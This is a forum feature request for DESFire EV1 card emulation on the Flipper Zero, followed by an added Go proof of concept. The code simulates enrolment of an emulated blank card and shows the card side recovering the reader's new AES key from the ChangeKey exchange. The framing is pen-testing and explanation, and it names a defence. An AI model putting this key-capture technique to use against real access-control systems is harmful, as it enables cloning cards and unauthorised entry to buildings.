DESFire EV1 emulation (feature request)

One of the risk factors with DESFire is that if you can emulate a blank card and “enrol” it on to a system as if it was a blank new card, it will have the keys stored. On a real DESFire card those keys are, of course, secure, but if the FlipperZero can emulate a DESFire, it can pretend to be a new card, get keys, and then show those keys and use them to emulate new cards with new data. Any system using common keys, as could be needed for an offline system really, would mean the system as a whole could be compromised.

I have written up the EV1 protocol DESFireAES/DESFire.pages at master · revk/DESFireAES · GitHub and it should not be rocket science to do this? I am not familiar enough with coding for flipper zero yet to do it myself. But I do have EV1 based door control systems here I can test it with.

This seems to fit with pen-test nature of flipper zero.

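Worked example (added here, not part of the post above and not taken from revk/DESFireAES or the Flipper Zero firmware) of why an emulated blank card ends up holding the site keys: the enrolment reader authenticates key 0 with the factory-default all-zero AES key, and the ChangeKey cryptogram that installs the new key is encrypted only under the session key derived from that authentication, so whoever played the card side can decrypt it. The EV1 AES authentication (CBC chaining across the four messages, session key = RndA[0:4]‖RndB[0:4]‖RndA[12:16]‖RndB[12:16], IV reset to zero after authentication) and the same-key ChangeKey layout (new key ‖ version ‖ CRC32 over command, key number and data ‖ zero padding) are from the publicly documented EV1 protocol as I know it, not from the post; the key `constructed-key!`, the nonces and the `Enrol` driver are constructed for the demo. Go is used because its standard library has AES-CBC, so the example runs with no dependencies. `Enrol` runs both sides and returns the key the card side recovered; the second scenario in the usage (card already carrying a non-default key) fails at the RndB' check, which is the only thing protecting a real card from the same trick.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
	"hash/crc32"
)

const cmdChangeKey, bs = 0xC4, 16 // ChangeKey command code, AES block size
var enc, dec = cipher.NewCBCEncrypter, cipher.NewCBCDecrypter

// cbc runs one AES-CBC pass; every EV1 frame here is whole blocks, so there is no padding logic.
func cbc(mode func(cipher.Block, []byte) cipher.BlockMode, key, iv, in []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err) // keys in this demo are always 16 bytes
	}
	out := make([]byte, len(in))
	mode(block, iv).CryptBlocks(out, in)
	return out
}

// desfireCRC32 is CRC-32 with init 0xFFFFFFFF and no final inversion (JAMCRC); sent little-endian.
func desfireCRC32(data []byte) uint32 { return crc32.ChecksumIEEE(data) ^ 0xFFFFFFFF }
func rotl(b []byte) []byte          { return append(append([]byte{}, b[1:]...), b[0]) } // RndA -> RndA'

// sessionKey = RndA[0:4] || RndB[0:4] || RndA[12:16] || RndB[12:16] (EV1 AES session key).
func sessionKey(rndA, rndB []byte) []byte {
	k := append(append([]byte{}, rndA[:4]...), rndB[:4]...)
	return append(append(k, rndA[12:]...), rndB[12:]...)
}

type party struct{ key, iv, rnd, peerRnd, session []byte } // one side: PCD (reader) or PICC (card/emulator)

// authenticateAES runs the four-message EV1 AuthenticateAES exchange and leaves a shared session key on both sides.
func authenticateAES(picc, pcd *party) error {
	// 1. PICC -> PCD: E(Kx, RndB) under a zero IV.
	eRndB := cbc(enc, picc.key, make([]byte, bs), picc.rnd)
	// 2. PCD -> PICC: E(Kx, RndA || RndB'), CBC-chained from the block it just received.
	pcd.peerRnd = cbc(dec, pcd.key, make([]byte, bs), eRndB)
	m2 := cbc(enc, pcd.key, eRndB, append(append([]byte{}, pcd.rnd...), rotl(pcd.peerRnd)...))
	// 3. PICC: RndB' only checks out if the PCD used the card's current key; reply E(Kx, RndA').
	pt := cbc(dec, picc.key, eRndB, m2)
	if !bytes.Equal(pt[bs:], rotl(picc.rnd)) {
		return errors.New("PICC: RndB' mismatch, reader holds a different key")
	}
	picc.peerRnd = pt[:bs]
	m3 := cbc(enc, picc.key, m2[bs:], rotl(picc.peerRnd))
	// 4. PCD: check RndA'.
	if !bytes.Equal(cbc(dec, pcd.key, m2[bs:], m3), rotl(pcd.rnd)) {
		return errors.New("PCD: RndA' mismatch")
	}
	// Both sides derive the session key from the nonces; the CBC IV restarts at zero.
	picc.session, pcd.session = sessionKey(picc.peerRnd, picc.rnd), sessionKey(pcd.rnd, pcd.peerRnd)
	picc.iv, pcd.iv = make([]byte, bs), make([]byte, bs)
	return nil
}

// changeKeyCmd (same key number as authenticated): C4 || keyNo || E(Ksess, newKey || ver || CRC32(C4 || keyNo || newKey || ver) || zero pad)
func (p *party) changeKeyCmd(keyNo byte, newKey []byte, ver byte) []byte {
	body := append(append([]byte{}, newKey...), ver)
	body = binary.LittleEndian.AppendUint32(body, desfireCRC32(append([]byte{cmdChangeKey, keyNo}, body...)))
	body = append(body, make([]byte, (bs-len(body)%bs)%bs)...) // 21 -> 32 bytes
	ct := cbc(enc, p.session, p.iv, body)
	p.iv = ct[len(ct)-bs:]
	return append([]byte{cmdChangeKey, keyNo}, ct...)
}

// recoverNewKey is the emulator's ChangeKey handler: decrypt under the session key, check the CRC, adopt the key, return it in the clear.
func (p *party) recoverNewKey(cmd []byte) ([]byte, byte, error) {
	if len(cmd) != 2+2*bs || cmd[0] != cmdChangeKey {
		return nil, 0, errors.New("unexpected ChangeKey frame")
	}
	pt := cbc(dec, p.session, p.iv, cmd[2:])
	p.iv = cmd[len(cmd)-bs:]
	newKey, ver := pt[:bs], pt[bs]
	if binary.LittleEndian.Uint32(pt[bs+1:]) != desfireCRC32(append(append([]byte{cmd[0], cmd[1]}, newKey...), ver)) {
		return nil, 0, errors.New("ChangeKey CRC mismatch")
	}
	p.key = append([]byte{}, newKey...)
	return newKey, ver, nil
}

// Enrol plays both sides: a reader holding readerKey authenticates key 0 of a card whose current key is cardKey, then changes it to newKey.
func Enrol(cardKey, readerKey, newKey []byte, ver byte, rndA, rndB []byte) ([]byte, byte, error) {
	card, reader := &party{key: cardKey, rnd: rndB}, &party{key: readerKey, rnd: rndA}
	if err := authenticateAES(card, reader); err != nil {
		return nil, 0, err
	}
	return card.recoverNewKey(reader.changeKeyCmd(0, newKey, ver))
}

func main() {
	blank, nonces := make([]byte, bs), make([]byte, 2*bs) // all-zero factory key; RndA || RndB
	rand.Read(nonces)
	got, ver, err := Enrol(blank, blank, []byte("constructed-key!"), 1, nonces[:bs], nonces[bs:])
	fmt.Printf("emulated blank card learned key %x (version %d), err=%v\n", got, ver, err)
}
```

The card side never needs anything secret to reach `recoverNewKey`: the all-zero default key is public, so the only real defence an enrolment system has is to refuse cards it did not provision itself (for example by checking the UID or a manufacturer signature before ChangeKey), which is exactly the check most offline systems skip.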